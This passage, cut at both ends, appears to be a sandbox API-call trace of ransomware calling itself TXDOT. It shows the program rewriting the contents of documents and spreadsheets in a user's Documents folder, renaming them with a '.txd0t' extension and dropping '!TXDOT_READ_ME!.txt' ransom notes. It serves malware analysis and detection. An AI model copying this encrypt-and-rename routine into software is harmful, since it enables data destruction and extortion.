(pszPath="\\\\?\\C:\\Users\\FD1HVy\\Documents\\spmR iwVLu JE 9B.rtf") returned="spmR iwVLu JE 9B.rtf" [0074.383] StrCpyW (in: psz1=0xed2594, psz2="!TXDOT_READ_ME!.txt" | out: psz1="!TXDOT_READ_ME!.txt") returned="!TXDOT_READ_ME!.txt" [0074.383] PathFileExistsW (pszPath="\\\\?\\C:\\Users\\FD1HVy\\Documents\\!TXDOT_READ_ME!.txt") returned 1 [0074.383] GetProcessHeap () returned 0xe30000 [0074.383] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0xed2558 | out: hHeap=0xe30000) returned 1 [0074.383] CloseHandle (hObject=0x46c) returned 1 [0074.386] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\FD1HVy\\Documents\\spmR iwVLu JE 9B.rtf" (normalized: "c:\\users\\fd1hvy\\documents\\spmr iwvlu je 9b.rtf"), lpNewFileName="\\\\?\\C:\\Users\\FD1HVy\\Documents\\spmR iwVLu JE 9B.rtf.txd0t" (normalized: "c:\\users\\fd1hvy\\documents\\spmr iwvlu je 9b.rtf.txd0t")) returned 1 [0074.386] SetEvent (hEvent=0x414) returned 1 [0074.386] WaitForSingleObject (hHandle=0x418, dwMilliseconds=0x3e8) returned 0x0 [0074.392] StrCpyW (in: psz1=0x53ef7b0, psz2="\\\\?\\C:\\Users\\FD1HVy\\Documents\\UgOWYrVuYDiW8pkWKYl.xls" | out: psz1="\\\\?\\C:\\Users\\FD1HVy\\Documents\\UgOWYrVuYDiW8pkWKYl.xls") returned="\\\\?\\C:\\Users\\FD1HVy\\Documents\\UgOWYrVuYDiW8pkWKYl.xls" [0074.392] StrCatW (in: psz1="\\\\?\\C:\\Users\\FD1HVy\\Documents\\UgOWYrVuYDiW8pkWKYl.xls", psz2=".txd0t" | out: psz1="\\\\?\\C:\\Users\\FD1HVy\\Documents\\UgOWYrVuYDiW8pkWKYl.xls.txd0t") returned="\\\\?\\C:\\Users\\FD1HVy\\Documents\\UgOWYrVuYDiW8pkWKYl.xls.txd0t" [0074.392] PathFileExistsW (pszPath="\\\\?\\C:\\Users\\FD1HVy\\Documents\\UgOWYrVuYDiW8pkWKYl.xls.txd0t") returned 0 [0074.392] SetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\FD1HVy\\Documents\\UgOWYrVuYDiW8pkWKYl.xls", dwFileAttributes=0x80) returned 1 [0074.393] CreateFileW (lpFileName="\\\\?\\C:\\Users\\FD1HVy\\Documents\\UgOWYrVuYDiW8pkWKYl.xls" (normalized: "c:\\users\\fd1hvy\\documents\\ugowyrvuydiw8pkwkyl.xls"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8000080, hTemplateFile=0x0) returned 0x464 [0074.393] GetFileSizeEx (in: hFile=0x464, lpFileSize=0x53efd60 | out: lpFileSize=0x53efd60*=60396) returned 1 [0074.393] SetFilePointerEx (in: hFile=0x464, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0074.393] WriteFile (in: hFile=0x464, lpBuffer=0x53efa44*, nNumberOfBytesToWrite=0x200, lpNumberOfBytesWritten=0x53efd5c, lpOverlapped=0x0 | out: lpBuffer=0x53efa44*, lpNumberOfBytesWritten=0x53efd5c*=0x200, lpOverlapped=0x0) returned 1 [0074.394] SetFilePointerEx (in: hFile=0x464, liDistanceToMove=0xffff1214, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0074.394] ReadFile (in: hFile=0x464, lpBuffer=0x4aa0020, nNumberOfBytesToRead=0xebe0, lpNumberOfBytesRead=0x53ef770, lpOverlapped=0x0 | out: lpBuffer=0x4aa0020*, lpNumberOfBytesRead=0x53ef770*=0xebe0, lpOverlapped=0x0) returned 1 [0074.395] SetFilePointerEx (in: hFile=0x464, liDistanceToMove=0xffff1420, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0074.395] WriteFile (in: hFile=0x464, lpBuffer=0x4aa0020*, nNumberOfBytesToWrite=0xebe0, lpNumberOfBytesWritten=0x53ef774, lpOverlapped=0x0 | out: lpBuffer=0x4aa0020*, lpNumberOfBytesWritten=0x53ef774*=0xebe0, lpOverlapped=0x0) returned 1 [0074.395] FlushFileBuffers (hFile=0x464) returned 1 [0074.414] GetProcessHeap () returned 0xe30000 [0074.414] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x112) returned 0xed1ec0 [0074.414] StrCpyW (in: psz1=0xed1ec0, psz2="\\\\?\\C:\\Users\\FD1HVy\\Documents\\UgOWYrVuYDiW8pkWKYl.xls" | out: psz1="\\\\?\\C:\\Users\\FD1HVy\\Documents\\UgOWYrVuYDiW8pkWKYl.xls") returned="\\\\?\\C:\\Users\\FD1HVy\\Documents\\UgOWYrVuYDiW8pkWKYl.xls" [0074.414] PathFindFileNameW (pszPath="\\\\?\\C:\\Users\\FD1HVy\\Documents\\UgOWYrVuYDiW8pkWKYl.xls") returned="UgOWYrVuYDiW8pkWKYl.xls" [0074.414] StrCpyW (in: psz1=0xed1efc, psz2="!TXDOT_READ_ME!.txt" | out: psz1="!TXDOT_READ_ME!.txt") returned="!TXDOT_READ_ME!.txt" [0074.414] PathFileExistsW (pszPath="\\\\?\\C:\\Users\\FD1HVy\\Documents\\!TXDOT_READ_ME!.txt") returned 1 [0074.414] GetProcessHeap () returned 0xe30000 [0074.414] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0xed1ec0 | out: hHeap=0xe30000) returned 1 [0074.414] CloseHandle (hObject=0x464) returned 1 [0074.563] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\FD1HVy\\Documents\\UgOWYrVuYDiW8pkWKYl.xls" (normalized: "c:\\users\\fd1hvy\\documents\\ugowyrvuydiw8pkwkyl.xls"), lpNewFileName="\\\\?\\C:\\Users\\FD1HVy\\Documents\\UgOWYrVuYDiW8pkWKYl.xls.txd0t" (normalized: "c:\\users\\fd1hvy\\documents\\ugowyrvuydiw8pkwkyl.xls.txd0t")) returned 1 [0074.564] SetEvent (hEvent=0x414) returned 1 [0074.564] WaitForSingleObject (hHandle=0x418, dwMilliseconds=0x3e8) returned 0x0 [0074.568] StrCpyW (in: psz1=0x53ef7a0, psz2="\\\\?\\C:\\Users\\FD1HVy\\Documents\\Z5Oif6_Mr_Ui\\2o _xfnucm3wfE92We.ods" | out: psz1="\\\\?\\C:\\Users\\FD1HVy\\Documents\\Z5Oif6_Mr_Ui\\2o _xfnucm3wfE92We.ods") returned="\\\\?\\C:\\Users\\FD1HVy\\Documents\\Z5Oif6_Mr_Ui\\2o _xfnucm3wfE92We.ods" [0074.568] StrCatW (in: psz1="\\\\?\\C:\\Users\\FD1HVy\\Documents\\Z5Oif6_Mr_Ui\\2o _xfnucm3wfE92We.ods", psz2=".txd0t" | out: psz1="\\\\?\\C:\\Users\\FD1HVy\\Documents\\Z5Oif6_Mr_Ui\\2o _xfnucm3wfE92We.ods.txd0t") returned="\\\\?\\C:\\Users\\FD1HVy\\Documents\\Z5Oif6_Mr_Ui\\2o _xfnucm3wfE92We.ods.txd0t" [0074.568] PathFileExistsW (pszPath="\\\\?\\C:\\Users\\FD1HVy\\Documents\\Z5Oif6_Mr_Ui\\2o _xfnucm3wfE92We.ods.txd0t") returned 0 [0074.569] SetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\FD1HVy\\Documents\\Z5Oif6_Mr_Ui\\2o _xfnucm3wfE92We.ods", dwFileAttributes=0x80) returned 1 [0074.569] CreateFileW (lpFileName="\\\\?\\C:\\Users\\FD1HVy\\Documents\\Z5Oif6_Mr_Ui\\2o _xfnucm3wfE92We.ods" (normalized: "c:\\users\\fd1hvy\\documents\\z5oif6_mr_ui\\2o _xfnucm3wfe92we.ods"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8000080, hTemplateFile=0x0) returned 0x468 [0074.569] GetFileSizeEx (in: hFile=0x468, lpFileSize=0x53efd60 | out: lpFileSize=0x53efd60*=90561) returned 1 [0074.569] SetFilePointerEx (in: hFile=0x468, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0074.569] WriteFile (in: hFile=0x468, lpBuffer=0x53efa44*, nNumberOfBytesToWrite=0x200, lpNumberOfBytesWritten=0x53efd5c, lpOverlapped=0x0 | out: lpBuffer=0x53efa44*, lpNumberOfBytesWritten=0x53efd5c*=0x200, lpOverlapped=0x0) returned 1 [0074.570] SetFilePointerEx (in: hFile=0x468, liDistanceToMove=0xfffe9c3f, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0074.570] ReadFile (in: hFile=0x468, lpBuffer=0x4aa0020, nNumberOfBytesToRead=0x161c0, lpNumberOfBytesRead=0x53ef760, lpOverlapped=0x0 | out: lpBuffer=0x4aa0020*, lpNumberOfBytesRead=0x53ef760*=0x161c0, lpOverlapped=0x0) returned 1 [0074.574] SetFilePointerEx (in: hFile=0x468, liDistanceToMove=0xfffe9e40, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0074.574] WriteFile (in: hFile=0x468, lpBuffer=0x4aa0020*, nNumberOfBytesToWrite=0x161c0, lpNumberOfBytesWritten=0x53ef764, lpOverlapped=0x0 | out: lpBuffer=0x4aa0020*, lpNumberOfBytesWritten=0x53ef764*=0x161c0, lpOverlapped=0x0) returned 1 [0074.575] FlushFileBuffers (hFile=0x468) returned 1 [0074.582] GetProcessHeap () returned 0xe30000 [0074.582] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x12a) returned 0xe9b648 [0074.582] StrCpyW (in: psz1=0xe9b648, psz2="\\\\?\\C:\\Users\\FD1HVy\\Documents\\Z5Oif6_Mr_Ui\\2o _xfnucm3wfE92We.ods" | out: psz1="\\\\?\\C:\\Users\\FD1HVy\\Documents\\Z5Oif6_Mr_Ui\\2o _xfnucm3wfE92We.ods") returned="\\\\?\\C:\\Users\\FD1HVy\\Documents\\Z5Oif6_Mr_Ui\\2o _xfnucm3wfE92We.ods" [0074.582] PathFindFileNameW (pszPath="\\\\?\\C:\\Users\\FD1HVy\\Documents\\Z5Oif6_Mr_Ui\\2o _xfnucm3wfE92We.ods") returned="2o _xfnucm3wfE92We.ods" [0074.582] StrCpyW (in: psz1=0xe9b69e, psz2="!TXDOT_READ_ME!.txt" | out: psz1="!TXDOT_READ_ME!.txt") returned="!TXDOT_READ_ME!.txt" [0074.582] PathFileExistsW (pszPath="\\\\?\\C:\\Users\\FD1HVy\\Documents\\Z5Oif6_Mr_Ui\\!TXDOT_READ_ME!.txt") returned 0 [0074.582] CreateFileW (lpFileName="\\\\?\\C:\\Users\\FD1HVy\\Documents\\Z5Oif6_Mr_Ui\\!TXDOT_READ_ME!.txt" (normalized: "c:\\users\\fd1hvy\\documents\\z5oif6_mr_ui\\!txdot_read_me!.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x474 [0074.583] WriteFile (in: hFile=0x474, lpBuffer=0x53ef794*, nNumberOfBytesToWrite=0x2, lpNumberOfBytesWritten=0x53ef790, lpOverlapped=0x0 | out: lpBuffer=0x53ef794*, lpNumberOfBytesWritten=0x53ef790*=0x2, lpOverlapped=0x0) returned 1 [0074.584] FlushFileBuffers (hFile=0x474) returned 1 [0074.586] WriteFile (in: hFile=0x474, lpBuffer=0x84d840*, nNumberOfBytesToWrite=0x7f0, lpNumberOfBytesWritten=0x53ef790, lpOverlapped=0x0 | out: lpBuffer=0x84d840*, lpNumberOfBytesWritten=0x53ef790*=0x7f0, lpOverlapped=0x0) returned 1 [0074.587] FlushFileBuffers (hFile=0x474) returned 1 [0074.588] CloseHandle (hObject=0x474) returned 1 [0074.588] GetProcessHeap () returned 0xe30000 [0074.588] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0xe9b648 | out: hHeap=0xe30000) returned 1 [0074.588] CloseHandle (hObject=0x468) returned 1 [0074.590] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\FD1HVy\\Documents\\Z5Oif6_Mr_Ui\\2o _xfnucm3wfE92We.ods" (normalized: "c:\\users\\fd1hvy\\documents\\z5oif6_mr_ui\\2o _xfnucm3wfe92we.ods"), lpNewFileName="\\\\?\\C:\\Users\\FD1HVy\\Documents\\Z5Oif6_Mr_Ui\\2o _xfnucm3wfE92We.ods.txd0t" (normalized: "c:\\users\\fd1hvy\\documents\\z5oif6_mr_ui\\2o _xfnucm3wfe92we.ods.txd0t")) returned 1 [0074.591] SetEvent (hEvent=0x414) returned 1 [0074.591] WaitForSingleObject (hHandle=0x418, dwMilliseconds=0x3e8) returned 0x0 [0074.592] StrCpyW (in: psz1=0x53ef7a0, psz2="\\\\?\\C:\\Users\\FD1HVy\\Documents\\Z5Oif6_Mr_Ui\\cpdJYzaQxXso.odt" | out: psz1="\\\\?\\C:\\Users\\FD1HVy\\Documents\\Z5Oif6_Mr_Ui\\cpdJYzaQxXso.odt") returned="\\\\?\\C:\\Users\\FD1HVy\\Documents\\Z5Oif6_Mr_Ui\\cpdJYzaQxXso.odt" [0074.592] StrCatW (in: psz1="\\\\?\\C:\\Users\\FD1HVy\\Documents\\Z5Oif6_Mr_Ui\\cpdJYzaQxXso.odt", psz2=".txd0t" | out: psz1="\\\\?\\C:\\Users\\FD1HVy\\Documents\\Z5Oif6_Mr_Ui\\cpdJYzaQxXso.odt.txd0t") returned="\\\\?\\C:\\Users\\FD1HVy\\Documents\\Z5Oif6_Mr_Ui\\cpdJYzaQxXso.odt.txd0t" [0074.592] PathFileExistsW (pszPath="\\\\?\\C:\\Users\\FD1HVy\\Documents\\Z5Oif6_Mr_Ui\\cpdJYzaQxXso.odt.txd0t") returned 0 [0074.592] SetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\FD1HVy\\Documents\\Z5Oif6_Mr_Ui\\cpdJYzaQxXso.odt", dwFileAttributes=0x80) returned 1 [0074.593] CreateFileW (lpFileName="\\\\?\\C:\\Users\\FD1HVy\\Documents\\Z5Oif6_Mr_Ui\\cpdJYzaQxXso.odt" (normalized: "c:\\users\\fd1hvy\\documents\\z5oif6_mr_ui\\cpdjyzaqxxso.odt"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8000080, hTemplateFile=0x0) returned 0x468 [0074.593] GetFileSizeEx (in: hFile=0x468, lpFileSize=0x53efd60 | out: lpFileSize=0x53efd60*=95858) returned 1 [0074.593] SetFilePointerEx (in: hFile=0x468, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0074.593] WriteFile (in: hFile=0x468, lpBuffer=0x53efa44*, nNumberOfBytesToWrite=0x200, lpNumberOfBytesWritten=0x53efd5c, lpOverlapped=0x0 | out: lpBuffer=0x53efa44*, lpNumberOfBytesWritten=0x53efd5c*=0x200, lpOverlapped=0x0) returned 1 [0074.594] SetFilePointerEx (in: hFile=0x468, liDistanceToMove=0xfffe878e, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0074.594] ReadFile (in: hFile=0x468, lpBuffer=0x4aa0020, nNumberOfBytesToRead=0x17670, lpNumberOfBytesRead=0x53ef760, lpOverlapped=0x0 | out: lpBuffer=0x4aa0020*, lpNumberOfBytesRead=0x53ef760*=0x17670, lpOverlapped=0x0) returned 1 [0074.596] SetFilePointerEx (in: hFile=0x468, liDistanceToMove=0xfffe8990, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0074.596] WriteFile (in: hFile=0x468, lpBuffer=0x4aa0020*, nNumberOfBytesToWrite=0x17670, lpNumberOfBytesWritten=0x53ef764, lpOverlapped=0x0 | out: lpBuffer=0x4aa0020*, lpNumberOfBytesWritten=0x53ef764*=0x17670, lpOverlapped=0x0) returned 1 [0074.596] FlushFileBuffers (hFile=0x468) returned 1 [0074.598] GetProcessHeap () returned 0xe30000 [0074.598] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x11e) returned 0xe9b648 [0074.598] StrCpyW (in: psz1=0xe9b648, psz2="\\\\?\\C:\\Users\\FD1HVy\\Documents\\Z5Oif6_Mr_Ui\\cpdJYzaQxXso.odt" | out: psz1="\\\\?\\C:\\Users\\FD1HVy\\Documents\\Z5Oif6_Mr_Ui\\cpdJYzaQxXso.odt") returned="\\\\?\\C:\\Users\\FD1HVy\\Documents\\Z5Oif6_Mr_Ui\\cpdJYzaQxXso.odt" [0074.598] PathFindFileNameW (pszPath="\\\\?\\C:\\Users\\FD1HVy\\Documents\\Z5Oif6_Mr_Ui\\cpdJYzaQxXso.odt") returned="cpdJYzaQxXso.odt" [0074.598] StrCpyW (in: psz1=0xe9b69e, psz2="!TXDOT_READ_ME!.txt" | out: psz1="!TXDOT_READ_ME!.txt") returned="!TXDOT_READ_ME!.txt" [0074.598] PathFileExistsW (pszPath="\\\\?\\C:\\Users\\FD1HVy\\Documents\\Z5Oif6_Mr_Ui\\!TXDOT_READ_ME!.txt") returned 1 [0074.598] GetProcessHeap () returned 0xe30000 [0074.598] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0xe9b648 | out: hHeap=0xe30000) returned 1 [0074.599] CloseHandle (hObject=0x468) returned 1 [0074.601] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\FD1HVy\\Documents\\Z5Oif6_Mr_Ui\\cpdJYzaQxXso.odt" (normalized: "c:\\users\\fd1hvy\\documents\\z5oif6_mr_ui\\cpdjyzaqxxso.odt"), lpNewFileName="\\\\?\\C:\\Users\\FD1HVy\\Documents\\Z5Oif6_Mr_Ui\\cpdJYzaQxXso.odt.txd0t" (normalized: "c:\\users\\fd1hvy\\documents\\z5oif6_mr_ui\\cpdjyzaqxxso.odt.txd0t")) returned 1 [0074.601] SetEvent (hEvent=0x414) returned 1 [0074.601] WaitForSingleObject (hHandle=0x418, dwMilliseconds=0x3e8) returned 0x0 [0074.605] StrCpyW (in: psz1=0x53ef7a0, psz2="\\\\?\\C:\\Users\\FD1HVy\\Documents\\Z5Oif6_Mr_Ui\\ivPZqJfxmHT.pps" | out: psz1="\\\\?\\C:\\Users\\FD1HVy\\Documents\\Z5Oif6_Mr_Ui\\ivPZqJfxmHT.pps") returned="\\\\?\\C:\\Users\\FD1HVy\\Documents\\Z5Oif6_Mr_Ui\\ivPZqJfxmHT.pps" [0074.605] StrCatW (in: psz1="\\\\?\\C:\\Users\\FD1HVy\\Documents\\Z5Oif6_Mr_Ui\\ivPZqJfxmHT.pps", psz2=".txd0t" | out: psz1="\\\\?\\C:\\Users\\FD1HVy\\Documents\\Z5Oif6_Mr_Ui\\ivPZqJfxmHT.pps.txd0t") returned="\\\\?\\C:\\Users\\FD1HVy\\Documents\\Z5Oif6_Mr_Ui\\ivPZqJfxmHT.pps.txd0t" [0074.605] PathFileExistsW (pszPath="\\\\?\\C:\\Users\\FD1HVy\\Documents\\Z5Oif6_Mr_Ui\\ivPZqJfxmHT.pps.txd0t") returned 0 [0074.605] SetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\FD1HVy\\Documents\\Z5Oif6_Mr_Ui\\ivPZqJfxmHT.pps", dwFileAttributes=0x80) returned 1 [0074.605] CreateFileW (lpFileName="\\\\?\\C:\\Users\\FD1HVy\\Documents\\Z5Oif6_Mr_Ui\\ivPZqJfxmHT.pps" (normalized: "c:\\users\\fd1hvy\\documents\\z5oif6_mr_ui\\ivpzqjfxmht.pps"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8000080, hTemplateFile=0x0) returned 0x474 [0074.605] GetFileSizeEx (in: hFile=0x474, lpFileSize=0x53efd60 | out: lpFileSize=0x53efd60*=49146) returned 1 [0074.605] SetFilePointerEx (in: hFile=0x474, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0074.605] WriteFile (in: hFile=0x474, lpBuffer=0x53efa44*, nNumberOfBytesToWrite=0x200, lpNumberOfBytesWritten=0x53efd5c, lpOverlapped=0x0 | out: lpBuffer=0x53efa44*, lpNumberOfBytesWritten=0x53efd5c*=0x200, lpOverlapped=0x0) returned 1 [0074.606] SetFilePointerEx (in: hFile=0x474, liDistanceToMove=0xffff3e06, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0074.606] ReadFile (in: hFile=0x474, lpBuffer=0x4aa0020, nNumberOfBytesToRead=0xbff0, lpNumberOfBytesRead=0x53ef760, lpOverlapped=0x0 | out: lpBuffer=0x4aa0020*, lpNumberOfBytesRead=0x53ef760*=0xbff0, lpOverlapped=0x0) returned 1 [0074.607] SetFilePointerEx (in: hFile=0x474, liDistanceToMove=0xffff4010, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0074.607] WriteFile (in: hFile=0x474, lpBuffer=0x4aa0020*, nNumberOfBytesToWrite=0xbff0, lpNumberOfBytesWritten=0x53ef764, lpOverlapped=0x0 | out: lpBuffer=0x4aa0020*, lpNumberOfBytesWritten=0x53ef764*=0xbff0, lpOverlapped=0x0) returned 1 [0074.608] FlushFileBuffers (hFile=0x474) returned 1 [0074.611] GetProcessHeap () returned 0xe30000 [0074.611] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x11c) returned 0xe9b648 [0074.611] StrCpyW (in: psz1=0xe9b648, psz2="\\\\?\\C:\\Users\\FD1HVy\\Documents\\Z5Oif6_Mr_Ui\\ivPZqJfxmHT.pps" | out: psz1="\\\\?\\C:\\Users\\FD1HVy\\Documents\\Z5Oif6_Mr_Ui\\ivPZqJfxmHT.pps") returned="\\\\?\\C:\\Users\\FD1HVy\\Documents\\Z5Oif6_Mr_Ui\\ivPZqJfxmHT.pps" [0074.611] PathFindFileNameW (pszPath="\\\\?\\C:\\Users\\FD1HVy\\Documents\\Z5Oif6_Mr_Ui\\ivPZqJfxmHT.pps") returned="ivPZqJfxmHT.pps" [0074.611] StrCpyW (in: psz1=0xe9b69e, psz2="!TXDOT_READ_ME!.txt" | out: psz1="!TXDOT_READ_ME!.txt") returned="!TXDOT_READ_ME!.txt" [0074.611] PathFileExistsW (pszPath="\\\\?\\C:\\Users\\FD1HVy\\Documents\\Z5Oif6_Mr_Ui\\!TXDOT_READ_ME!.txt") returned 1 [0074.611] GetProcessHeap () returned 0xe30000 [0074.611] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0xe9b648 | out: hHeap=0xe30000) returned 1 [0074.611] CloseHandle (hObject=0x474) returned 1 [0074.612] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\FD1HVy\\Documents\\Z5Oif6_Mr_Ui\\ivPZqJfxmHT.pps" (normalized: "c:\\users\\fd1hvy\\documents\\z5oif6_mr_ui\\ivpzqjfxmht.pps"), lpNewFileName="\\\\?\\C:\\Users\\FD1HVy\\Documents\\Z5Oif6_Mr_Ui\\ivPZqJfxmHT.pps.txd0t" (normalized: "c:\\users\\fd1hvy\\documents\\z5oif6_mr_ui\\ivpzqjfxmht.pps.txd0t")) returned 1 [0074.613] SetEvent (hEvent=0x414) returned 1 [0074.613] WaitForSingleObject (hHandle=0x418, dwMilliseconds=0x3e8) returned 0x0 [0074.614] StrCpyW (in: psz1=0x53ef780, psz2="\\\\?\\C:\\Users\\FD1HVy\\Documents\\Z5Oif6_Mr_Ui\\jDtkUz0kU8\\8GgGCWAXxjKLpeoA40OY.odp" | out: psz1="\\\\?\\C:\\Users\\FD1HVy\\Documents\\Z5Oif6_Mr_Ui\\jDtkUz0kU8\\8GgGCWAXxjKLpeoA40OY.odp") returned="\\\\?\\C:\\Users\\FD1HVy\\Documents\\Z5Oif6_Mr_Ui\\jDtkUz0kU8\\8GgGCWAXxjKLpeoA40OY.odp" [0074.614] StrCatW (in: psz1="\\\\?\\C:\\Users\\FD1HVy\\Documents\\Z5Oif6_Mr_Ui\\jDtkUz0kU8\\8GgGCWAXxjKLpeoA40OY.odp", psz2=".txd0t" | out: psz1="\\\\?\\C:\\Users\\FD1HVy\\Documents\\Z5Oif6_Mr_Ui\\jDtkUz0kU8\\8GgGCWAXxjKLpeoA40OY.odp.txd0t") returned="\\\\?\\C:\\Users\\FD1HVy\\Documents\\Z5Oif6_Mr_Ui\\jDtkUz0kU8\\8GgGCWAXxjKLpeoA40OY.odp.txd0t" [0074.614] PathFileExistsW (pszPath="\\\\?\\C:\\Users\\FD1HVy\\Documents\\Z5Oif6_Mr_Ui\\jDtkUz0kU8\\8GgGCWAXxjKLpeoA40OY.odp.txd0t") returned 0 [0074.614] SetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\FD1HVy\\Documents\\Z5Oif6_Mr_Ui\\jDtkUz0kU8\\8GgGCWAXxjKLpeoA40OY.odp", dwFileAttributes=0x80) returned 1 [0074.614] CreateFileW (lpFileName="\\\\?\\C:\\Users\\FD1HVy\\Documents\\Z5Oif6_Mr_Ui\\jDtkUz0kU8\\8GgGCWAXxjKLpeoA40OY.odp" (normalized: "c:\\users\\fd1hvy\\documents\\z5oif6_mr_ui\\jdtkuz0ku8\\8gggcwaxxjklpeoa40oy.odp"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8000080, hTemplateFile=0x0) returned 0x474 [0074.615] GetFileSizeEx (in: hFile=0x474, lpFileSize=0x53efd60 | out: lpFileSize=0x53efd60*=98693) returned 1 [0074.615] SetFilePointerEx (in: hFile=0x474, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0074.615] WriteFile (in: hFile=0x474, lpBuffer=0x53efa44*, nNumberOfBytesToWrite=0x200, lpNumberOfBytesWritten=0x53efd5c, lpOverlapped=0x0 | out: lpBuffer=0x53efa44*, lpNumberOfBytesWritten=0x53efd5c*=0x200, lpOverlapped=0x0) returned 1 [0074.615] SetFilePointerEx (in: hFile=0x474, liDistanceToMove=0xfffe7c7b, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0074.616] ReadFile (in: hFile=0x474, lpBuffer=0x4aa0020, nNumberOfBytesToRead=0x18180, lpNumberOfBytesRead=0x53ef740, lpOverlapped=0x0 | out: lpBuffer=0x4aa0020*, lpNumberOfBytesRead=0x53ef740*=0x18180, lpOverlapped=0x0) returned 1 [0074.618] SetFilePointerEx (in: hFile=0x474, liDistanceToMove=0xfffe7e80, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0074.618] WriteFile (in: hFile=0x474, lpBuffer=0x4aa0020*, nNumberOfBytesToWrite=0x18180, lpNumberOfBytesWritten=0x53ef744, lpOverlapped=0x0 | out: lpBuffer=0x4aa0020*, lpNumberOfBytesWritten=0x53ef744*=0x18180, lpOverlapped=0x0) returned 1 [0074.618] FlushFileBuffers (hFile=0x474) returned 1 [0074.620] GetProcessHeap () returned 0xe30000 [0074.620] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x144) returned 0xe9b648 [0074.620] StrCpyW (in: psz1=0xe9b648, psz2="\\\\?\\C:\\Users\\FD1HVy\\Documents\\Z5Oif6_Mr_Ui\\jDtkUz0kU8\\8GgGCWAXxjKLpeoA40OY.odp" | out: psz1="\\\\?\\C:\\Users\\FD1HVy\\Documents\\Z5Oif6_Mr_Ui\\jDtkUz0kU8\\8GgGCWAXxjKLpeoA40OY.odp") returned="\\\\?\\C:\\Users\\FD1HVy\\Documents\\Z5Oif6_Mr_Ui\\jDtkUz0kU8\\8GgGCWAXxjKLpeoA40OY.odp" [0074.620] PathFindFileNameW (pszPath="\\\\?\\C:\\Users\\FD1HVy\\Documents\\Z5Oif6_Mr_Ui\\jDtkUz0kU8\\8GgGCWAXxjKLpeoA40OY.odp") returned="8GgGCWAXxjKLpeoA40OY.odp" [0074.620] StrCpyW (in: psz1=0xe9b6b4, psz2="!TXDOT_READ_ME!.txt" | out: psz1="!TXDOT_READ_ME!.txt") returned="!TXDOT_READ_ME!.txt" [0074.620] PathFileExistsW (pszPath="\\\\?\\C:\\Users\\FD1HVy\\Documents\\Z5Oif6_Mr_Ui\\jDtkUz0kU8\\!TXDOT_READ_ME!.txt") returned 0 [0074.620] CreateFileW (lpFileName="\\\\?\\C:\\Users\\FD1HVy\\Documents\\Z5Oif6_Mr_Ui\\jDtkUz0kU8\\!TXDOT_READ_ME!.txt" (normalized: "c:\\users\\fd1hvy\\documents\\z5oif6_mr_ui\\jdtkuz0ku8\\!txdot_read_me!.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x478 [0074.620] WriteFile (in: hFile=0x478, lpBuffer=0x53ef774*, nNumberOfBytesToWrite=0x2, 